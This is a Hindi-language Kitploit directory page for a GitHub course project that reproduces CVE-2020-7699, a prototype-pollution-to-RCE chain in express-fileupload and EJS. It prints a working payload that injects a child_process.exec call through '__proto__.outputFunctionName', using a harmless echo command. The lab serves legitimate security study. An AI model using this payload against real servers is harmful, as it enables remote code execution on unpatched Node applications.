Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-7699_reproduce — CVE-2020-7699 का पुनरुत्पादन, सॉफ्टवेयर सुरक्षा सिद्धांत पाठ्यक्रम का बड़ा असाइनमेंट | Kitploit
उपकरण/GitHubGitHub/zodiac12-pub/cve-2020-7699_reproduce
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षापेलोड डेवलपमेंटलैब और अभ्यास
GitHubzodiac12-pub/cve-2020-7699_reproduce

CVE-2020-7699_reproduce

CVE-2020-7699 का पुनरुत्पादन, सॉफ्टवेयर सुरक्षा सिद्धांत पाठ्यक्रम का बड़ा असाइनमेंट

रिपॉजिटरी देखें
14 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-7699 पुनरुत्पादन

Node.js RCE भेद्यता (CVE-2020-7699) का पुनरुत्पादन, मेरी प्रयोगशाला का कार्य

सेटअप

Node.js संस्करण: v14.16.1, कृपया सुनिश्चित करें कि Node.js का संस्करण 14 है (अन्य संस्करण शायद काम करेगा, मैंने परीक्षण नहीं किया)

Python संस्करण: 3.9.5, Python का उपयोग केवल HTTP हमला अनुरोध भेजने के लिए किया जाता है, किसी विशिष्ट संस्करण की आवश्यकता नहीं है

बस clone करें रिपॉजिटरी को, npm i चलाकर निर्भरताएँ स्थापित करें। मैंने 2 और कमांड दिए हैं:

  • npm run start-server का उपयोग करके लक्ष्य सर्वर (पीड़ित सर्वर) शुरू करें
  • npm run launch-attack का उपयोग करके हमला शुरू करें

विश्लेषण

express-fileUpload: 1.1.10 से नीचे का संस्करण प्रभावित होगा

express-fileUpload में प्रोटोटाइप प्रदूषण मौजूद है

भेद्यता: express-fileUpload प्रोटोटाइप प्रदूषण

इसका उपयोग कैसे करें: __proto__.outputFunctionName को प्रदूषित करें ताकि निष्पादित करने के लिए कमांड लिख सकें। उदाहरण: echo "ATTACK SUCCESSFUL" > attacked.txt

exec_command = "echo \"ATTACK SUCCESSFUL\" > attacked.txt"

{
    "__proto__.outputFunctionName": (
        None,
        f"x;process.mainModule.require('child_process').exec('{exec_command}');x"
    )
}

ejs में RCE मौजूद है

भेद्यता: ejs xxx.outputFunctionName को निष्पादित करने का प्रयास करेगा जो undefined है, लेकिन यदि object.outputFunctionName प्रदूषित है, तो वह इसके बजाय इसे निष्पादित करेगा

टूल डाउनलोड करें